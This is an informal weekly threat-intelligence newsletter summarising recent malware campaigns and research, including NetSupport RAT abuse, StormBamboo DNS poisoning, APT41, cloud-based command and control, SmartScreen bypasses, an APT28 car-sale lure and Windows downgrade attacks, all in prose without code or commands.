Cyber Deceptions: Weaponized Tools & Stealthy Attacks

Hi, my fellow malware enthusiast,

Yes, yes, I know it’s Saturday, not Thursday; I’m late. No point fussing about it now; what’s done is done! But guess what? You get the chance to enjoy my improved introduction! 😂

I’m sure you’ve been eagerly waiting for this week’s newsletter—there’s a lot to uncover, and I promise it’s worth the wait!👀 From IT tools turned cyber weapons to the latest in APT group tactics, we’ve got a jam-packed edition for you. We’ll dive into how everyday software like NetSupport Manager is being weaponized, expose the design flaws lurking in Windows, and reveal how cloud services are becoming the new playground for stealthy espionage.

So, let’s not delay any further—dive in and enjoy the read!

📰In today’s newsletter

  • NetSupport Manager: From IT Tool to Cyber Weapon

  • StormBamboo’s DNS Poisoning: Unmasking the Malware Campaign

  • APT41's Stealthy Attack on Taiwanese Institute Unveiled

  • APT Groups Embrace Cloud Services for Stealthy Espionage

  • Design Flaws in Windows Smart App Control and SmartScreen Exposed

  • Fighting Ursa Uses Car Ads to Distribute HeadLace Backdoor

  • Unmasking Windows Downgrade Attacks: New Vulnerabilities Exposed

NetSupport Manager: From IT Tool to Cyber Weapon

NetSupport Manager, a legitimate remote administration tool from 1989, has increasingly been repurposed by cybercriminals as a Remote Access Trojan (RAT). Since 2017, this software has been widely recognized as a threat, especially as remote work surged in the 2020s, leading to its frequent use in phishing and drive-by download attacks.

💡We’re not talking about a literal drive-by guys… We’re talking about a malicious programs being installed without your knowledge Just making sure we’re on the same page😂

In late 2023, a significant campaign emerged where attackers used fake browser updates on compromised sites to deploy NetSupport RAT. They leveraged PowerShell commands to install the tool, gaining control over victims’ systems. By early 2024, researchers observed that the attackers had further refined their techniques, making the malware harder to detect.

👉For more details checkout this blog written by Christopher Morrison.

Cybercriminals often exploit the easiest entry points when targeting organizations. While software vulnerabilities are a common target, sophisticated attacks typically leverage multiple vectors. Many cybercriminals begin by breaching internet-facing applications to establish an initial foothold.

Software vulnerabilities remain a significant risk for several reasons:

  • Vulnerabilities are often discovered only after being exploited.

  • Vendors may delay releasing security updates.

  • Engineers need time to test patches in a virtual environment to avoid disrupting production.

Groups like Muddled Libra have dedicated R&D teams that identify software vulnerabilities and develop automated tools to find and exploit them. With the integration of AI, they can now detect bugs and target vulnerable systems more efficiently and on a larger scale.

StormBamboo’s DNS Poisoning: Unmasking the Malware Campaign

In mid-2023, Volexity uncovered multiple incidents where systems across various organizations were infected with malware linked to the StormBamboo group, also known as Evasive Panda. The malware, targeting both macOS and Windows systems, was traced back to a DNS poisoning attack at the internet service provider (ISP) level.

Initially, the infection vector was unclear, but Volexity later identified that StormBamboo was manipulating DNS responses for specific domains associated with automatic software updates. The group targeted software with insecure update processes, such as those using HTTP without proper digital signature validation. This allowed the attackers to replace legitimate updates with malware, including MACMA and POCOSTICK.

💡I’m always amazed at how various DNS attacks can be used as a initial vector

This attack mirrors a previous incident linked to DriftingBamboo, a potentially related threat actor. In April 2023, ESET speculated about a similar attack vector, which Volexity has now confirmed, showing that StormBamboo controlled ISP DNS infrastructure to inject malware via corrupted updates. This blog post details how these attacks exploited vulnerable software update mechanisms, highlighting a broader threat landscape.

💡Whenever there’s the word bamboo in the name you know it’s related to a Chinese hacking group😂

👉Check out the blog to learn more about the subject.

APT41's Stealthy Attack on Taiwanese Institute Unveiled

In mid-July 2023, APT41 launched a sophisticated cyberattack on a Taiwanese research institute, showcasing the complexity of modern cyber warfare. The attack used advanced tools and techniques to maintain stealth and control.

The attackers deployed ShadowPad and Cobalt Strike. ShadowPad exploited an outdated Microsoft Office IME binary to deliver a custom payload, while Cobalt Strike was introduced via the Go-based loader CS-Avoid-Killing, designed to evade antivirus detection.

💡Yes, Microsoft again…

Although the exact initial access vector remains unknown, the breach involved the use of a web shell to maintain persistent access and deploy additional payloads. This method ensured ongoing control over the compromised environment.

Cisco Talos discovered the intrusion in August 2023 by identifying abnormal PowerShell commands connecting to an external IP address to download and execute malicious scripts. This incident underscores the importance of monitoring unusual PowerShell activity as a critical indicator of potential breaches.

👉Want to know more? Dive into the blog for the full scoop!

Signature-based detection is a reliable tool for identifying known threats, but it's not sufficient to tackle the evolving landscape of cyber threats. Malware creators employ various techniques to evade detection, such as altering code, using polymorphic and metamorphic malware, and exploiting zero-day vulnerabilities that signature-based systems can't recognize. Over-reliance on signatures can lead to false positives, wasting resources and overwhelming security teams. To effectively protect against modern threats, it's essential to implement a comprehensive security strategy that includes behavioral analysis, machine learning, and other advanced techniques.

APT Groups Embrace Cloud Services for Stealthy Espionage

Symantec research reveals a rising trend of advanced persistent threat (APT) groups using cloud storage services from Microsoft and Google for command and control (C2) and data exfiltration. This tactic allows attackers to exploit widely trusted services, making their activities less likely to trigger security alerts.

Recent findings show APTs are increasingly adopting these techniques. Symantec’s Threat Hunter Team identified several espionage operations using cloud services and noted that attackers benefit from the low cost and stealth of cloud platforms. However, if detected, cloud accounts can be quickly suspended, potentially disrupting the attack and revealing valuable information about the operation.

💡Attacker are really clever always using new technologies in a creative way!

New malware like GoGra and Trojan.Grager, which use Microsoft’s Graph API for C2, highlight the growing sophistication of these attacks. GoGra, used against a South Asian media organization, reads encrypted commands from Outlook. Trojan.Grager, targeting organizations in Taiwan and Vietnam, relies on OneDrive for command execution.

Symantec also discovered other cloud-based threats, including Onedrivetools and MoonTag, as well as a Google Drive tool used by the Firefly group. The increase in APT groups adopting these methods underscores a trend of mimicking successful techniques observed in other attacks.

👉Want to know more? you can read the blog about it!

Design Flaws in Windows Smart App Control and SmartScreen Exposed

Cybersecurity researchers have identified vulnerabilities in Microsoft’s Smart App Control (SAC) and SmartScreen that could allow attackers to bypass security checks and gain initial access to systems without triggering warnings.

💡Yes, Microsoft yet again…

SAC, introduced with Windows 11, blocks untrusted apps based on cloud intelligence and digital signatures. SmartScreen, part of Windows 10, evaluates URLs and files for potential threats using a reputation-based system. When SAC is enabled, it replaces SmartScreen.

Elastic Security Labs highlighted several methods attackers use to circumvent these protections, including:

  • Reputation Hijacking: Using apps with good reputations to bypass security.

  • Reputation Seeding: Exploiting vulnerabilities in seemingly benign binaries.

  • Reputation Tampering: Modifying legitimate files to insert malicious code.

  • LNK Stomping: Exploiting bugs in Windows shortcut handling to remove security labels.

These techniques have been in use for years, indicating ongoing challenges in relying solely on native security features. Researchers stress the importance of vigilant scrutiny of downloads and security measures beyond built-in protections.

👉For more details on this new hacker group, read this blog.

Kaspersky’s GReAT team has released their latest quarterly report on APT activity for Q1 2024. Notable findings include the discovery of a new Golang-based backdoor, Durian, used in a supply-chain attack in South Korea, and significant campaigns in the Middle East by groups like Gelsemium. The report also highlights ongoing hacktivist activity, particularly related to the Israel-Hamas conflict, and the expansion of the Spyrtacus malware to target multiple platforms. The report underscores the continued evolution and global reach of APT threats driven by geopolitical and cyberespionage motives.

Fighting Ursa Uses Car Ads to Distribute HeadLace Backdoor

Russian threat actor Fighting Ursa, also known as APT28 or Fancy Bear, has adopted a new tactic to target diplomats through a deceptive used-car sale email scheme. The attack involves a .zip file supposedly containing images of an Audi Q7 Quattro SUV for diplomatic use. In reality, these files are executables with hidden .exe extensions.

💡Using car for diplomatic use? I guess we learn something new everyday!

Yes, Microsoft yet again

The scheme includes a Romanian phone number and contact details for added credibility. Once the victim downloads and opens the file, it deploys the HeadLace backdoor malware. This malware establishes persistent access for espionage activities.

The attack utilizes a free service called "webhook" to host a malicious HTML page, which determines if the target machine is running Windows. If so, it offers the malicious .zip file. Inside are disguised executables and scripts that load and execute the HeadLace backdoor, leading to data theft and surveillance.

Fighting Ursa's use of such tactics aligns with their previous campaigns and highlights the group’s ongoing use of free services to mask their activities. Notably, the hidden file extensions in Windows, which obscure the true nature of these files, remain a significant security flaw.

Fighting Ursa is known for high-profile attacks, including interference in the 2016 US elections and recent campaigns against Ukrainian government bodies.

👉Want to know more? you can read about it, here!

Unmasking Windows Downgrade Attacks: New Vulnerabilities Exposed

Downgrade attacks, or version-rollback attacks, target fully updated software by reverting it to vulnerable older versions, thus allowing exploitation of previously patched flaws. In 2023, the BlackLotus UEFI Bootkit used such an attack to bypass Secure Boot on Windows, revealing the potential of this technique.

Recent research presented at Black Hat USA 2024 and DEF CON 32 (2024) highlights significant findings regarding downgrade attacks on Windows. The study led to the creation of Windows Downdate, a tool capable of crafting undetectable and persistent downgrades in critical OS components. This tool can elevate privileges, bypass security features, and render patched Windows machines vulnerable to thousands of past exploits.

Key findings include:

  1. Windows Update Vulnerability: The research uncovered a flaw in the Windows Update process, allowing undetectable and irreversible downgrades of essential OS components like DLLs, drivers, and the NT kernel.

  2. Virtualization Stack Risk: Downgrades also exposed vulnerabilities in Windows Virtualization-Based Security (VBS), including Credential Guard and Hyper-V’s hypervisor, bypassing UEFI locks without physical access.

  3. Need for Awareness: The findings underscore the necessity for increased awareness and research into downgrade attacks, highlighting that current OS protections may not fully address these threats.

  4. Design Flaws: The research revealed design flaws in Windows’ virtualization stack, allowing less privileged levels to update more secure components, suggesting that older features might still pose risks.

The study calls for more research into OS-based downgrade attacks and emphasizes the importance of examining in-the-wild attacks to anticipate and mitigate potential threats.

👉Want to know more? you can read about it, here!

Security researchers have uncovered the largest known ransomware payment to date—$75 million paid to the Dark Angels group. This discovery, detailed in Zscaler’s ThreatLabz 2024 Ransom Report, raises concerns that other threat actors may replicate these tactics. The report also highlighted an 18% increase in ransomware attacks, with manufacturing, healthcare, technology, and education sectors being the most targeted.

✉️ Wrapping Up

In the world of malware, understanding is key. As we delve into these threats together, remember that knowledge and vigilance are our best allies.

If you find this newsletter helpful and know others who might benefit from it, I'd be grateful if you could pass it along. 🙏

Until next time, stay informed and keep your defenses sharp. Here’s to staying one step ahead

Thanks for reading!